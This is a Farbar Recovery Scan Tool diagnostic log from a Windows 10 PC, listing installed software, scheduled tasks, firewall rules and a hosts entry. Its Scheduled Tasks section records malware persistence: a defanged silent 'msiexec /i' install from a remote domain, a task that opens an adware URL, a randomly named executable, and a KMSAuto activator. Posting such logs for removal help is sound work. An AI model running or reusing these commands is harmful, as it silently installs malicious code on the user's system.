Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21.11.2018
Ran by usuario (24-11-2018 18:06:07)
Running from C:\Users\usuario\Desktop
Windows 10 Pro Version 1803 17134.407 (X64) (2018-11-17 00:32:51)
Boot Mode: Safe Mode (with Networking)
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-3915770623-3759347639-1613647934-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3915770623-3759347639-1613647934-503 - Limited - Disabled)
Invitado (S-1-5-21-3915770623-3759347639-1613647934-501 - Limited - Disabled)
usuario (S-1-5-21-3915770623-3759347639-1613647934-1001 - Administrator - Enabled) => C:\Users\usuario
WDAGUtilityAccount (S-1-5-21-3915770623-3759347639-1613647934-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\uTorrent) (Version: 3.5.4.44846 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.008.20081 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 31.0.0.96 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0) (Version: 20.0.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.1 - Advanced Micro Devices, Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version:  - Cheat Engine)
CPUID CPU-Z 1.87 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.87 - CPUID, Inc.)
Discord (HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\Discord) (Version: 0.0.301 - Discord Inc.)
Dishonored 2 (HKLM-x32\...\Dishonored 2_is1) (Version:  - )
Epic Games Launcher (HKLM-x32\...\{9B504F12-DA3B-4CEC-A6FD-B07D6C1FEA26}) (Version: 1.1.167.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Google Chrome (HKLM\...\{AA1B5CB3-7646-3858-A35C-158DB3846A9F}) (Version: 70.0.3538.110 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Java 8 Update 191 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180191F0}) (Version: 8.0.1910.12 - Oracle Corporation)
Java 8 Update 191 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180191F0}) (Version: 8.0.1910.12 - Oracle Corporation)
K-Lite Codec Pack 14.5.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.5.5 - KLCP)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Malwarebytes versión 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
Microsoft Office Profesional Plus 2016 - es-es (HKLM\...\ProPlusRetail - es-es) (Version: 16.0.11001.20108 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\OneDriveSetup.exe) (Version: 18.192.0920.0015 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
MSI Afterburner 4.5.0 (HKLM-x32\...\Afterburner) (Version: 4.5.0 - MSI Co., LTD)
MSI DragonEye (HKLM\...\{7116875E-F251-4C33-AB3F-37DE05B15595}_is1) (Version: 0.0.2.6 - MSI)
MSI Gaming APP (HKLM-x32\...\{E0229316-E73B-484B-B9E0-45098AB38D8C}}_is1) (Version: 6.2.0.49 - MSI)
Nitro Pro 9 (HKLM\...\{552C86A4-E3F6-4C01-8079-D66E92CF334B}) (Version: 9.5.3.8 - Nitro)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.6 - Notepad++ Team)
OEM Application Profile (HKLM-x32\...\{7F5DCD33-1039-C3B2-9538-B645B65BBA63}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.11001.20108 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.11001.20108 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0C0A-1000-0000000FF1CE}) (Version: 16.0.11001.20108 - Microsoft Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.10.714.2016 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8040 - Realtek Semiconductor Corp.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs OBS 0.11.3 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 0.11.3 - General Workings, Inc.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TP-LINK TL-WN821N(C)_TL-WN822N_TL-WN823N Driver (HKLM-x32\...\{852E893E-E4FD-45BB-8B17-72ADDF686974}) (Version: 1.3.1 - TP-LINK)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{C5FDDED7-DEC7-48B4-AFD8-DFB8A0FD199A}) (Version: 2.51.0.0 - Microsoft Corporation)
USB Disk Security (HKLM-x32\...\USB Disk Security_is1) (Version:  - Zbshareware Lab)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
XSplit Broadcaster (HKLM-x32\...\{306BF455-B199-433A-9217-7E80CE1B7683}) (Version: 2.8.1607.1944 - SplitmediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2018-11-12] ()
ContextMenuHandlers1: [NP8ShellExtension] -> {9C4B85B8-956C-49BF-9BA5-101384E562B2} => C:\Program Files\Nitro\Pro 9\NPShellExtension.dll [2014-08-01] (Nitro PDF)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-06] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-02-04] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {029AE7A2-9367-49BE-971E-D0CF5B1E9E8D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {12407AB4-701D-4038-A393-8FB4A19ABB19} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-14] (Adobe Systems Incorporated)
Task: {19602A3C-6345-4BA9-AFF0-4E7E9394D3D6} - System32\Tasks\MSIOSDx64_Host => C:\Program Files (x86)\MSI\Gaming APP\OSD\x64\MsiGamingOSD_x64.exe [2017-09-05] (Micro-Star INT'L CO., LTD.)
Task: {2D80FB38-436D-41AA-954D-9200A6A58286} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {3268519A-9765-4A48-A5FD-23453043DDD0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-11-16] (Google Inc.)
Task: {33992D3E-B3FE-4A5E-BD0A-DB9176D7BDB0} - System32\Tasks\MSIOSDx86_Host => C:\Program Files (x86)\MSI\Gaming APP\OSD\x86\MsiGamingOSD_x86.exe [2017-09-05] (Micro-Star INT'L CO., LTD.)
Task: {3D576F42-CA4D-4B99-8010-5BC694FA10AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {3ED37AAE-4A2C-41F9-9277-14F58D4673CC} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-11-02] (Microsoft Corporation)
Task: {40A492BD-CE8D-4668-819B-FBDFB4612196} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-11-17] (Microsoft Corporation)
Task: {54A90687-5D8B-477A-969D-ED1680B86120} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\sdxhelper.exe [2018-11-17] (Microsoft Corporation)
Task: {5AE47641-9CD8-4507-832B-ADCE30CA22BD} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-06] (Advanced Micro Devices, Inc.)
Task: {5C7BED72-32AB-49D9-8C38-124B10473B34} - System32\Tasks\{6FAAD7ED-945D-1F3D-7344-4A1CF404A45C} => C:\Program Files (x86)\Common Files\hAwYUAXJE.exe [2018-04-11] (Microsoft Corporation)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-11] ()
Task: {6E670BDA-DFD2-4103-9CEE-F2D4A60627DC} - System32\Tasks\MSIGH_Host => C:\Program Files (x86)\MSI\Gaming APP\GamingHotkey.exe [2017-11-01] (Micro-Star INT'L CO., LTD.)
Task: {74E4D3B4-E4B9-4D09-93FF-0AA379EF1EF4} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-11-17] (Microsoft Corporation)
Task: {7712C825-649D-4197-A60A-82514E11EC07} - System32\Tasks\{C61D7FD7-9DCC-9B3F-D9C4-59839A671D13} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://asompharr.com/cl/?guid=t59mp7zvs8eu7nlo643wtthp2p0s6cdq&prid=1&pid=5_1301_41602
Task: {79619546-DDD9-422E-86E7-C39AF3A40953} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2018-11-17] (Microsoft Corporation)
Task: {8E751ED9-59AE-4C98-8827-CD861BBACE15} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-11-16] (Google Inc.)
Task: {9DBEC8AA-1434-4735-97DD-6F8842EDF03C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2018-11-17] (Microsoft Corporation)
Task: {B141150B-133D-4DBF-A4F7-F657FEE76ED9} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2016-08-10] (MSFree Inc.)
Task: {B5ECA36D-1EE6-4CE1-82B4-CBAA8B7D0C13} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\sdxhelper.exe [2018-11-17] (Microsoft Corporation)
Task: {B8DBA90C-0EF2-4383-A245-C2A58F732785} - System32\Tasks\MSISW_Host => C:\Windows\SysWOW64\muachost.exe [2015-08-18] (MSI)
Task: {C402E782-5F47-4FB6-A920-B5EBC16F6936} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-06] (Advanced Micro Devices, Inc.)
Task: {D6C92521-7047-4171-81B0-D0FF5417BA96} - System32\Tasks\AdobeGCInvoker-1.0-DESKTOP-CM2QFMQ-usuario => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-09-10] (Adobe Systems, Incorporated)
Task: {ED1EAD7C-0560-4234-820D-0C98E1F704A1} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-11-02] (Microsoft Corporation)
Task: {F132082F-7019-4989-BDD0-8850D0E8F19A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-11-16] (Microsoft Corporation)
Task: {F2869E2E-73DD-4237-BA82-5C283D76283E} - System32\Tasks\{65151975-D51E-B35B-8543-ED1A20B306C4} => "msiexec" /i hxxps://faremler.com/jemtb0pcam1q.eux /q
Task: {FC86950E-75CB-4FDD-BA82-FFD4ED99E93B} - System32\Tasks\klcp_update => CodecTweakTool.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2018-11-24 16:58 - 2018-11-24 17:15 - 002695360 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-04-11 18:34 - 2018-04-11 18:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-11-16 21:14 - 2018-11-17 00:21 - 008981800 _____ () C:\Program Files\Microsoft Office\root\Office16\3082\GrooveIntlResource.dll
2018-11-12 18:35 - 2018-11-12 18:35 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2018-04-11 18:34 - 2018-04-11 18:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-11 18:34 - 2018-04-11 18:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-11-20 17:16 - 2018-11-01 01:55 - 002185216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [484]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2018-04-11 18:38 - 2018-11-24 16:56 - 000000880 _____ C:\Windows\system32\Drivers\etc\hosts

0.0.0.0                   telemetry.malwarebytes.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\usuario\Desktop\PROJECT-Hunters-Jhin-Vayne-Cinematic-HD-Wallpaper-Background-Official-Art-Artwork-League-of-Legends-lol.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3915770623-3759347639-1613647934-1001\...\StartupApproved\Run: => "Steam"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{10E0545C-CF6A-4AD4-892E-3F991CC2EB15}] => (Allow) C:\Program files (x86)\raidxpert2\apache\bin\httpd.exe
FirewallRules: [{377A3CE0-18F7-4791-9C1D-6AF0C3CCB5E5}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{E0F3D7BC-65EF-4737-AC72-81A1C11B792F}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
FirewallRules: [{5191D0AD-D6B0-4B17-8610-36A6AA4E9AD4}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{F85366D9-0C01-45B1-98E8-A0E611A24B5F}] => (Allow) C:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.cam.exe
FirewallRules: [{78026738-F143-4997-A434-EB7D471C8E2B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{752075B3-C1A9-4A68-9D6B-4E17D2175987}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [TCP Query User{6E661785-DAC2-44B9-A6D4-B33E020F45B3}D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [UDP Query User{A1481354-E275-4BFB-A7C4-B99B14051156}D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\lol\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [{B0297618-BADF-49DC-ACBA-64231CE5459E}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{08AD1D79-70B3-4B21-B593-BD995ED24DAB}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{E6A7C047-C0D7-4CB6-887F-FB51DD1BFD44}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F50A7D47-1C81-400C-84B6-1E50144E097D}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B7E24E3E-8008-43E8-BD0B-7902480B6A4D}] => (Allow) D:\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [{A6E8EA71-ABD9-4EC0-A6DF-0601633E398E}] => (Allow) D:\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [TCP Query User{62A787A3-1D31-4123-B806-3B318BB25F12}D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [UDP Query User{8EF571EB-B4D9-44DC-8CC8-EFCAE3E418BB}D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [{F74C1B26-A127-4DB3-AFF5-7B9C0B09E030}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{78A3195C-25AC-4512-8D72-9480160D8D7E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{CEA44204-69D2-4BA2-BF7C-D72A077086E9}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{D4B97479-874F-4847-AF36-9CC9A8882306}] => (Allow) D:\Juegos\Steam\Steam.exe
FirewallRules: [{0D5D9C89-C77D-4A8A-A87C-27AF33F560AD}] => (Allow) D:\Juegos\Steam\Steam.exe
FirewallRules: [{F7E9BD23-AB61-49CF-9581-DE803C14763F}] => (Allow) D:\Juegos\Steam\bin\cef\cef.win7\steamwebhelper.exe
